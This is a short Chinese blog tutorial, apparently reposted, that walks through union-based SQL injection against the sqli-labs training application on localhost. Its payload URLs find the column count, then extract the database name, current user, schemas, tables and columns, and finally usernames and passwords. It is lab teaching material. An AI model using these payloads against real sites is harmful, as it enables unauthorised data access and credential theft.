sql注入之联合语句查询

企业开发 2018-09-17 22:38:50 阅读次数: 0

1.下判断注入点

  and 1=1,and 1=2; '

捕获.GIF

2.用order by 查看数据库存在的字段

    http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 3#

捕获2.GIF

  http://127.0.0.1/sqli-labs-master/Less-2/?id=1 order by 4#

   捕获1.GIF

3.用union进行联合查询,找到数据库名称显示的字段

  http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,3#

   捕获3.GIF

4.爆出数据库名称和用户名

  http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,database(),current_user()#

   捕获4.GIF

  爆出所有数据库

   http://127.0.0.1/sqli-labs-master/Less-2/?id=0 union select 1,2,group_concat(schema_name) from information_schema.schemata#

    捕获8.GIF

5.爆出数据库中存在的表名

http://127.0.0.1/sqli-labs-master/Less-2/?id=0  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema =‘security’),3--+

捕获5.GIF

6.爆出表中存在的列名

   http://127.0.0.1/sql/Less-2/?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3-- +

   捕获6.GIF

7.爆出用户名密码

    http://127.0.0.1/sql/Less-1/?id=0 union select 1,(select concat_ws(0x7e,username,password) from users limit 1,1),3-- +

    捕获7.GIF

猜你喜欢

转载自blog.51cto.com/13905896/2176380
今日推荐
Arc Browser for Windows 1.0 正式 GA
90后程序员开发视频搬运软件、不到一年获利超 700 万,结局很刑!
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
周排行
rbac——界面、权限
Apache CXF + SpringMVC 整合发布WebService
so插件化
Vue.js实战系列---图标字体制作(svg格式)
PAT乙级 1007 素数对猜想(孪生素数对) (20分) ---(C语言 + 详细注释)
被IRM保护的文档,打开失败
Calendar和Date计算日期差的小问题
win10子系统ubuntu18.4安装docker
利用Wrap Shell Script定位Android Native内存泄漏
MySQL: Transaction (Part I - Basic Concept)
每日归档
更多
2024-05-03(19)
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022